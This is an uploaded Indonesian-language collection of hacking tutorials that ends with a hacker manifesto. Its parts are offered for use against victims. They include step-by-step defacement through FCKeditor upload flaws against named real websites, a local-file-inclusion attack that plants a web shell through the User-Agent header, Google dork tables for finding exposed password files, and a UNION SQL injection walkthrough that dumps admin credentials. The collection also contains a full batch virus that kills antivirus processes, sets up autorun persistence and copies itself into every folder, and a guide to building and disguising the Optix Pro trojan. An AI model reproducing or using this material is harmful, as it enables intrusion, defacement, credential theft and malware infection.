deface web dengan power by zooper

Upload: bradda-rizki-rit

Post on 06-Jul-2015

369 views

Category:

Documents


0 download

TRANSCRIPT

Deface web dengan power by zooperOk kali ini saya akan memberikan tutorial hacking (deface web) dengan salah satu exploits web yang sering saya gunakan untuk mendeface website ok langsung saja pertama kita cari site yg vuln di google.. dengan dork : powered by zoopeer anggap lah kita sudah menemukan site nya.. target : http://www.kaian.ir/ tambahkan exploitnya : fck/editor/filemanager/browser/default/browser.html? Type=File&Connector=connectors/php/connector.php example : http://www.kaian.ir//fck/editor/filemana...nector.php oke. setelah selesai . upload file kita.. jika selesai upload. ganti "fck/editor/filemanager/browser/default/browser.html? Type=File&Connector=connectors/php/connector.php" dengan images/File/namashell.htm example : http://www.kaian.ir/images/File/hatuhaha.html good luck...!!!

Remote file upload opencart (Web hacking)ok lngsung aja... cari target website anda dork : Powered By OpenCart site:com "site:" terserah, yang penting support opencart dalam demo ini target: http://www.harleypartsintl.com/ bisa juga dgn trget www.target.com/pacth/ itu kalo dpt trget yg ad di /patch/ nya

ex: http://www.target.com/patch/

nah kalo dh dpt trget, lngsung aj kita inject exploitnya exploit :

admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

jdi nya gni

http://www.harleypartsintl.com/admin/view/javascript/fckeditor/editor/filemanager/conne ctors/test.html

kalo target yang ad /patch/ , inject nya d belakang patch nya

ex:www.target.com/patch/admin/view/javascript/fckeditor/editor/filemanager/connectors/ test.html

liat yg kluar, dstu trdpat tmpat upload file nya..... connector pilih PHP lngsung aja kita upload file html deface kita... jika berhasil mka akan kluar alert sprti ini Code: "file uploaded with no errors" liat file kita , apkah telah d upload dgn mengklik "Get Folders and Files" skrng liat hasilnya....

ex hasil deface saya: http://www.harleypartsintl.com/hatuhaha.html

sayangnya file yang kita upload nggk bisa nimpa file sblm nya, tetapi duplikat file...file(1).html or file(2).html..

Deface web dengan LFI (Local file incluctions)Tahap 1.check dulu webnya vuln atau tidak contoh misalnya web target kita.

http://hernawan.co.tv/index.php?page=contoh

untuk test situs web target kita apakah ada LFI vuln ganti dan tambahkan tanda "../" (tanpa tanda kutip) pada

http://hernawan.co.tv/index.php?page=contoh

menjadi

http://hernawan.co.tv/index.php?page=../

Jika ada pesan error dibawah ini,

message= Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 20

kemungkinan situs tersebut terdapat LFI untuk memastikan nya kita masuk ke step berikut nya yaitu mencoba mengaccess file /etc/password

http://hernawan.co.tv/index.php?page=../../etc/passwd

bila pesan errornya masih sama dengan pesan sebelumnya, maka tambahkan ../ lagi sampai menampilkan pesan mirip =

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

sekarang kita check apakah proc/self/environ dapat di akses

http://hernawan.co.tv/index.php?page=../../proc/self/environ

jika berhasil , maka akan mendapat pesan

DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..

%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F.. %2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN= [email protected]@website.comAlamat e-mail ini diproteksi dari spabot, silahkan aktifkan Javascript untuk melihatnya SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at http://hernawan.co.tv Port 80 Jika tidak berarti proc/self/environ tidak bisa di akses (kemungkinan web target menggunakan FreeBSD) Tahap2.Upload shell to victim with tamperdata Tamperdata itu salah satu addon mozila, googling dan download untuk mencoba tutorial ini. setelah tamper data di install , buka tamper data dan pada User-Agent masukan command code sebagai berikut:

http://hernawan.co.tv/index.php?page=../../../../../../proc/self/environ

kemudian muncul dialog box klik az tamper,kemudian akan muncul jendela baru lagi nah di jendela baru ubah User-Agent menjadi script injection shell. jika tidak bekerja coba exec() atau shell_exec() atau passthru() karena mungkin sistem() dapat dinonaktifkan pada webserver dari php.ini Jika sukses maka shell anda dapat di buka di contoh:

http://hernawan.co.tv/shell.php

Sekian dulu....

Cara mendapatkan password akun gmail,facebook,yahoo dll via google dorkGoogle sebagai web pencarian no 1 saat ini memang belum ada duanya. teknik pencarian dengan penggunaan macam tipe dan operator membuat user dapat membuat berbagai macam variasi

pencarian. kita tidak akan membahas berbagai macam operator tersebut, karena judul artikel ini mendapatkan password dan username. semua tabel dalam artikel ini diambil dari buku google hacking for penetration testers, mungkin ada temen2 yang belum sempet baca jadi saya tulis aja biar semua bisa menikmati. biar temen2 yang masih newbie tidak terheran heran jika seseorang bisa mendapatkan banyak passworddari website. jadi gak usah heran. TABEL KATA KATA KUNCI MENDAPATKAN USERNAMES KATA KUNCI | KETERANGAN inurl:admin inurl: |userlist Generic userlist files inurl:admin filetype: |asp Generic userlist files inurl:userlist | inurl: |Half-life statistics file, lists username and hlstats intext: |other information Server Username | filetype:ctl | inurl:haccess. |Microsoft FrontPage equivalent of htaccess ctl Basic |shows Web user credentials filetype:reg | reg intext: |Microsoft Internet Account Manager can internet account manager |reveal usernames and more filetype:wab wab |Microsoft Outlook Express Mail address |books filetype:mdb inurlrofiles |Microsoft Access databases containing |profiles. index.of perform.ini |mIRC IRC ini file can list IRC usernames and |other information inurl:root.asp?acs=anon |Outlook Mail Web Access directory can be |used to discover usernames filetype:conf inurlroftpd. |PROFTP FTP server configuration file conf sample |reveals |username and server information filetype:log username putty |PUTTY SSH client logs can reveal

|usernames |and server information filetype:rdp rdp |Remote Desktop Connection files reveal user |credentials intitle:index.of |UNIX bash shell history reveals commands .bash_history |typed at a bash command prompt; usernames |are often typed as argument strings intitle:index.of |UNIX shell history reveals commands typed at .sh_history |a shell command prompt; usernames are |often typed as argument strings index of lck |Various lock files list the user currently using |a file +intext:webalizer +intext: |Webalizer Web statistics page lists Web userTotal Usernames +intext: |names and statistical information Usage Statistics for filetype:reg reg HKEY_ |Windows Registry exports can reveal CURRENT_USER |username usernames and other information TABEL KATA-KATA KUNCI MENDAPATKAN PASSWORD KATA KUNCI | KETERANGAN inurl:/db/main.mdb |ASP-Nuke passwords filetype:cfm cfapplication |ColdFusion source with potential passwords name password filetypeass |dbman credentials pass intext:userid allinurl:auth_user_file.txt |DCForum user passwords eggdrop filetype:user user |Eggdrop IRC user credentials filetype:ini inurl:flashFXP.ini |FlashFXP FTP credentials filetype:url +inurl:ftp:// |FTP bookmarks cleartext passwords +inurl:@

inurl:zebra.conf intext: |GNU Zebra passwords password -sample -test -tutorial download filetype:htpasswd htpasswd |HTTP htpasswd Web user credentials intitle:Index of .htpasswd |HTTP htpasswd Web user credentials htgroup -intitle:dist -apache -htpasswd.c intitle:Index of .htpasswd |HTTP htpasswd Web user credentials htpasswd.bak http://*:*@www bob:bob |HTTP passwords (bob is a sample username) sets mode: +k |IRC channel keys (passwords) Your password is * |Remember IRC NickServ registration passwords this for later use signin filetype:url |JavaScript authentication credentials LeapFTP intitle:index.of./ |LeapFTP client login credentials sites.ini modified inurl:lilo.conf filetype:conf |LILO passwords password -tatercounter2000 -bootpwd man filetype:config config intext: |Microsoft .NET application credentials appSettings User ID filetypewd service |Microsoft FrontPage Service Web passwords intitle:index.of |Microsoft FrontPage Web credentials administrators.pwd # -FrontPage- |Microsoft FrontPage Web passwords inurl:service.pwd extwd inurl:_vti_pvt inurl: |Microsoft FrontPage Web passwords (Service | authors | administrators) inurlerform filetype:ini |mIRC nickserv credentials intitle:index of intext: |mySQL database credentials

connect.inc intitle:index of intext: |mySQL database credentials globals.inc filetype:conf oekakibbs |Oekakibss user passwords filetype:dat wand.dat |Opera Magic Wand Web credentials inurlspfd.conf intext: |OSPF Daemon Passwords password -sample -test -tutorial download index.of passlist |Passlist user credentials inurlasslist.txt |passlist.txt file user credentials filetype:dat password.dat |password.dat files inurlassword.log filetype:log |password.log file reveals usernames, |passwords,and hostnames filetype:log inurl:password.log |password.log files cleartext |passwords inurleople.lst filetype:lst |People.lst generic password file intitle:index.of config.php |PHP Configuration File database |credentials inurl:config.php dbuname dbpass |PHP Configuration File database |credentials inurl:nuke filetype:sql |PHP-Nuke credentials filetype:conf inurlsybnc.conf |psyBNC IRC user credentials USER.PASS= filetype:ini ServUDaemon |servU FTP Daemon credentials filetype:conf slapd.conf |slapd configuration files root password inurl:slapd.conf intext: |slapd LDAP credentials credentials -manpage -Manual Page -man: -sample

inurl:slapd.conf intext: |slapd LDAP root password rootpw -manpage -Manual Page -man: -sample filetype:sql IDENTIFIED BY cvs |SQL passwords filetype:sql password |SQL passwords filetype:ini wcx_ftp |Total Commander FTP passwords filetype:netrc password |UNIX .netrc user credentials index.of.etc |UNIX /etc directories contain |various credential files intitle:Index of..etc passwd |UNIX /etc/passwd user credentials intitle:index.of passwd |UNIX /etc/passwd user credentials passwd.bak intitle:Index of pwd.db |UNIX /etc/pwd.db credentials intitle:Index.of etc shadow |UNIX /etc/shadow user credentials intitle:index.of master.passwd |UNIX master.passwd user credentials intitle:Index of spwd.db |UNIX spwd.db credentials passwd -pam.conf filetype:bak inurl:htaccess| |UNIX various password file backups passwd|shadow|htusers filetype:inc dbconn |Various database credentials filetype:inc intext:mysql_ |Various database credentials, server names connect filetyperoperties inurl:db |Various database credentials, server names intextassword inurl:vtund.conf intextass cvs |Virtual Tunnel Daemon passwords inurl:wvdial.conf intext: |wdial dialup user credentials password filetype:mdb wwforum |Web Wiz Forums Web credentials

AutoCreate=TRUE password=* |Website Access Analyzer user passwords filetypewl pwl |Windows Password List user credentials filetype:reg reg +intext: |Windows Registry Keys containing user defaultusername intext: |credentials defaultpassword filetype:reg reg +intext: |Windows Registry Keys containing user internet account manager |credentials index of/ ws_ftp.ini |WS_FTP FTP credentials parent directory filetype:ini ws_ftp pwd |WS_FTP FTP user credentials inurl:/wwwboard |wwwboard user credentials mungkin temen2 ada yang ingin melihat password dari website jerman? mungkin sebaiknya kita juga mengganti kata password dengan memakai bahasa jerman tentunya dibawah ini adalah tabel 5 negara beserta terjemahan password dalam bahasa masing2 negara. BAHASA |KATA-KATA| TRANSLATE German |password | Kennwort Spanish |password | contrasea French |password | mot de passe Italian |password | parola daccesso Portuguese |password | senha

Script virus yang mematikan antiviruskalo mau mirip sality,gw pernah buat dari batch doang jadi nanti ntr file ini menyebar dengan tiruan nama2 folder yg di infeksikan misal di drive C: ada windows nanti windows itu bakal terbentuk jadi salinan virus nya ya formatnya .bat tapi masih belum gw kembangkan save dengan nama sohai.bat ya

pake notepad ajah kok gw buatiinnya ================================================= @echo off reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\ Parameters\FirewallPolicy\StandardProfile\Authorized Applications\ListSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Infect /t REG_SZ /d %systemroot%\sohai.bat /f > nul reg add HKLM\SYSTEM\ControlSet001\Control\SafeBoot /v Infect /t REG_SZ/d %systemroot %\sohai.bat /f > nul reg add HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot /v Infect /t REG_SZ/d %systemroot%\sohai.bat /f > nul copy %0 %Systemroot%\Infect > nul reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Infect /t REG_SZ /d %systemroot%\sohai.bat /f > nul copy %0 *.bat > nul tskill ALG tskill aswUpdSv tskill avast! Antivirus tskill avast! Mail Scanner tskill avast! Web ScannerAVP tskill BackWeb Plug-in - 4476822 tskill bdss tskill BGLiveSvc tskill BlackICE tskill CAISafe tskill ccEvtMgr tskill ccProxy tskill ccSetMgr tskill Eset Service tskill F-Prot Antivirus Update Monitor tskill fsbwsys tskill FSDFWD tskill F-Secure Gatekeeper Handler Starter tskill fshttps tskill FSMA tskill InoRPC tskill InoRT tskill InoTask tskill ISSVC tskill KPF4 tskill LavasoftFirewall tskill LIVESRV tskill McAfeeFramework tskill McShield tskill McTaskManager

tskill navapsvc tskill NOD32krn tskill NPFMntor tskill NSCService tskill Outpost Firewall main module tskill OutpostFirewall tskill PAVFIRES tskill PAVFNSVR tskill PavProt tskill PavPrSrv tskill PAVSRV tskill PcCtlCom tskill PersonalFirewal tskill PREVSRV tskill ProtoPort Firewall service tskill PSIMSVC tskill RapApp tskill SmcService tskill SNDSrvc tskill SPBBCSvc tskill Symantec Core LC tskill Tmntsrv tskill TmPfw tskill tmproxy tskill UmxAgent tskill UmxCfg tskill UmxLU tskill UmxPol tskill vsmon tskill VSSERV tskill WebrootDesktopFirewallDataService tskill WebrootFirewall tskill XCOMM cls cd %userprofile%\desktop copy Infect.bat H.I.V.avc copy Infect.bat H.I.V.key copy Infect.bat H.I.V.vdb copy Infect.bat FixVirus.bat cd %userprofile%My Documents copy Infect.bat H.I.V.avc copy Infect.bat H.I.V.key copy Infect.bat H.I.V.vdb copy Infect.bat FixVirus.bat For /R D":\" /D %%a in (*) do copy %0 "%%~fa\%%~nxa.bat" For /R C":\" /D %%a in (*) do copy %0 "%%~fa\%%~nxa.bat"

For /R E":\" /D %%a in (*) do copy %0 "%%~fa\%%~nxa.bat" For /R F":\" /D %%a in (*) do copy %0 "%%~fa\%%~nxa.bat" echo [autorun]>>C:\autorun.inf open=sohai.bat>>C:\autorun.inf echo [autorun]>>D:\autorun.inf open=sohai.bat>>D:\autorun.inf echo [autorun]>>E:\autorun.inf open=sohai.bat>>E:\autorun.inf echo [autorun]>>F:\autorun.inf open=sohai.bat>>F:\autorun.inf echo [autorun]>>G:\autorun.inf open=sohai.bat>>G:\autorun.inf Attrib +r +h C:\autorun.inf Attrib +r +h D:\autorun.inf Attrib +r +h E:\autorun.inf Attrib +r +h F:\autorun.inf Attrib +r +h G:\autorun.inf ==============================================

Hacking website dengan Sql injectionPengertian sql injection: SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data. Yang perlu di ketahui sebelum sql injection pada mysql: karakter: ' atau comments: /* atau -information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x =========== =step Satu:= =========== carilah target misal: [site]/berita.php?id=100 Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error. contoh: [site]/berita.php?id=100' atau [site]/berita.php?id=-100 ehingga muncul pesan error seperti berikut (masih bnyak lagi):

========== =step Dua:= ========== mencari dan menghitung jumlah table yang ada dalam databasenya... gunakan perintah : order by contoh: [site]/berita.php?id=-100+order+by+1-- atau [site]/berita.php?id=-100+order+by+1/* ceklah secara step by step (satupersatu)... misal: [site]/berita.php?id=-100+order+by+1-[site]/berita.php?id=-100+order+by+2-[site]/berita.php?id=-100+order+by+3-[site]/berita.php?id=-100+order+by+4-sehingga muncul error atau hilang pesan error... misal: [site]/berita.php?id=-100+order+by+9-berarti yang kita ambil adalah sampai angka 8 menjadi [site]/berita.php?id=-100+order+by+8-=========== =step Tiga:= =========== untuk mengeluarkan angka berapa yang muncul gunakan perintah union karena tadi error sampai angka 9 maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8-ok seumpama yg keluar angka 5 gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau [site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8-lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan

perintah From+Information_schema.. untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema.. ============ =step Empat:= ============ untuk menampilkan table yg ada pada web tsb adalah perintah table_name >>> dimasukan pada angka yg keluar tadi perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir Code: [site]/berita.php?id=100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables-seumpama table yang muncul adalah "admin" =========== =step Lima:= =========== untuk menampilkan semua isi dari table tsb adalah perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

[site]/berita.php?id=100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+w here+table_schema=database()-============= = step Enam: = ============= perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir

[site]/berita.php?id=100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema .colu mns+where+table_name=0xhexa-pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya website yg digunakan untuk konversi : http://www.v3n0m.net/ascii.htm contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

[site]/berita.php?id=100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema .colu mns+where+table_name=0x61646D696E-============ =step Tujuh:= ============ memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir Contoh : [site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+ (nama table berasal)-contoh kata yang keluar adalah id,username,password Contoh : [site]/berita.php?id=100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin-============== = step Delapan:= ============== tahap terakhir mencari halam admin atau login .

Menjalankan Trojan Horse Klasik Optix ProSebelum membaca tulisan ini, sebaiknya ente telah membaca tulisan Konsep & Menjalankan Trojan Bagian Pertama. Sperti yang udah ada pada tulisan sebelumnya, Trojan Optik Pro juga terdiri atas dua bagian yaitu client.exe(bagian client) dan builder.exe(bagian server). Langkah menjalankan Trojan Optik Pro(Download Trojan Optix Pro): 1. Jalankan builder.exe untuk mencipatakan Trojan server, trus berikan nama & buat icon apa aja yang mampu menarik perhatian orang (biasanya untuk icon kebanyakan menggunakan icon multimedia). Langkahnya : klik menu Main Setting, trus General Information

Dibagian inilah inti dari pembuatan Server Trojan, krn dibagian ini kita akan menentukan Server Port, scara default portnya ialah 3410, namun kita bisa merubah port ini mulai dari 1024 65535(berdasarkan RFC 1700). Sehinggan Trojan yg kita buat susah untuk terdeteksi oleh Pemburu Trojan lain. Server Password fungsinya untuk pada saat Trojan Client koneksi ke Trojan Server. Fake Error sgt berhubungan dgn bagian Server Icon yg berguna untuk menipu sang korban saat menjalankan Server Trojan yang kita buat. Contohnya, kita buat Trojan dgn icon Media Player(klik Server Icon trus pilih Media Player) dan menentukan pesan Fake Error dengan File Corrupt. Jika kita perhatikan skilas icon Trojan yg kita buat tidak tampak berbeda dgn file media player yg asli, namun jika diperhatikan scara detil kliatan kualitas icon file Trojan lebih buruk dari file media player yg aslinya. Slanjutnya klik menu Startup & Installation, lalu Startup bagian ini berfungsi untuk menentukan cara yg akan digunakan agar program Server Trojan yg kita buat dijalankan scara otomatis tiap kali komputer korban dihidupkan. Terdapat beberapa cara agar program berjalan otomatis di windows yaitu dgn setting registry, file.win, file.ini. Fungsi S7 yaitu sbagai program perantara yg akan meload program Trojan yang sebenarnya agar korban gak curiga saat program itu berjalan otomatis dikomputernya.

Kemudian klik menu File Setup, disini kita menentukan nama samaran Trojan pada saat Trojan dijalankan. Biasanya nama file yg digunakan mirip dengan File System Windows seperti printer.exe, system32.exe, dll. Agar pada saat korban melihat dari Task Manager Trojan yang jalan dikomputernya terbaca dengan nama File System yg kita buat. Pada menu Notifications, ialah bagian yg digunakan untuk pemberitahuan kepada kita kalo sang korban kita sedang OnLine, kita tinggal pilih jenis pemberitahuan yg kita inginkan. Informasi yg diberikan ialah yang telah ditentukan pada setting di General Information dalam kolom Notification String Info seperti alamat IP,Password, Versi Windows, Port Trojan. Biasanya para hacker menggunakan ICQ, jadi pada saat korban OnLine maka ICQ kita mendapat pesan tentang informasi informasi sang korban. Untuk itu sebelumnya kita harus mempunyai account di ICQ, Download ICQ. Bagian Firewall & AVS Evasion adalah bagian yg menarik, karna memungkinkan Trojan mematikan AntiVirus maupun firewall yang terinstall dikomputer korban yg bertujuan agar Trojan tidak diketahui atau dihalangi oleh antivirus maupun firewall. Setelah semua selesai disetting, saatnya kita menekan tombol Build/create Server, lalu simpan dengan nama yang menurut anda akan menarik perhatian org untuk mengkliknya seperti bokep.exe, atopun rahasia.exe, dll. Misalkan kita save dgn nama porno.exe, maka pada saat Trojan diklik maka secara otomatis Trojan mengopy dirinya k directory system dengan nama yg tlah kita buat di Startup & Installation->File Setup->Server File Name. Program system32 inilah yg akan dijalankan scara otomatis sehingga file asli porno.exe tidak diperlukan lagi dan bisa dihapus. Server Trojan sudah selesai diciptakan. 2. Setelah program Server Trojan selesai, jalankan Program Client Trojan. Menggunakan program Client Trojan ini cukup mudah, kita masukkan IP korban, kemudian port yg tlah kita tentukan, trus password, lalu klik tombol Connect. Setelah terkoneksi, kita bisa membuat korban pusing, bingung karna monitornya tiba-tiba kita matikan, DVD Roomnya mati sendiri, dll.

Download Trojan Optix Pro

[*]===Th3-Manifesto-Of-H4ckers===[*]

[*]===Th3-Manifesto-Of-H4ckers===[*]Ini adalah dunia kami sekarang, dunianya elektron dan switch, keindahan sebuah baud. Kami mendayagunakan sebuah sistem yang telah ada tanpa membayar, yang bisa jadi biaya tersebut sangatlah murah jika tidak dijalankan dengan nafsu tamak mencari keuntungan, dan kalian sebut kami kriminal. Kami menjelajah, dan kalian sebut kami kriminal. Kami mengejar pengetahuan, dan kalian sebut kami kriminal.

Kami hadir tanpa perbedaan warna kulit, kebangsaan, ataupun prasangka keagamaan, dan kalian sebut kami kriminal. Kalian membuat bom atom, kalian menggelar peperangan, kalian membunuh, berlaku curang, membohongi kami dan mencoba meyakinkan kami bahwa semua itu demi kebaikan kami, tetap saja kami yang disebut kriminal. Ya, aku memang seorang kriminal. Kejahatanku adalah rasa keingintahuanku. Kejahatanku adalah karena menilai orang lain dari apa yang mereka katakan dan pikirkan, bukan pada penampilan mereka. Kejahatanku adalah menjadi lebih pintar dari kalian, sesuatu yang tak kan kalian maafkan. Aku memang seorang hacker, dan inilah manifesto saya. Kalian bisa saja menghentikanku, tetapi kalian tak mungkin menghentikan kami semua. Bagaimanapun juga, kami semua senasib seperjuangan. ::Hacking Is Not Crime But Hacking Is Art..::